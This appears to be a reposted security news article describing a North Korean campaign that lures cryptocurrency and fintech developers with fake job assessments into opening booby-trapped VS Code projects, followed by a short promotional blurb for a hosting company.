North Korean hackers have been targeting software developers, particularly in the cryptocurrency, blockchain, and fintech sectors, through a malicious campaign that employs compromised Microsoft Visual Studio Code (VS Code) projects. This latest tactic, which originated in December 2025, is part of the ongoing "Contagious Interview" campaign.
Researchers from Jamf Threat Labs reported that these threat actors are using the allure of job assessments to lure potential victims. They instruct targets to clone certain GitHub, GitLab, or Bitbucket repositories and open them in VS Code. Once the project is opened, a backdoor implant is activated, enabling remote code execution on the victim’s system.
The method involves manipulating VS Code task configuration files to execute malicious scripts. These scripts are designed to be triggered automatically each time a file in the project is opened, thanks to a specific configuration option. The final goal is to retrieve harmful payloads hosted on Vercel domains, which vary according to the victim’s operating system. The campaign has shown increased sophistication, capable of using multi-stage dropper techniques disguised as benign spell-check dictionaries.
Upon executing these scripts, the malware establishes a connection with a remote server, which allows it to receive and run additional JavaScript instructions. This includes a backdoor allowing continuous communication with the server, and it can send basic system information back to the threat actors.
Researchers have noted that after the initial infection, new JavaScript is executed, which calls back to the server every few seconds and runs additional scripts to erase its tracks. The nature of this behavior suggests the code may have been generated with the help of AI, as indicated by the presence of inline comments.
The evolving tactics of these North Korean actors indicate a refining of their methods, meant to maximize the chances of successful attacks while simultaneously targeting individuals with access to financial resources or intellectual property. Their persistent updates to these strategies further highlight the ongoing challenge posed by state-sponsored cyber threats amid heightened international scrutiny and sanctions against the regime.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.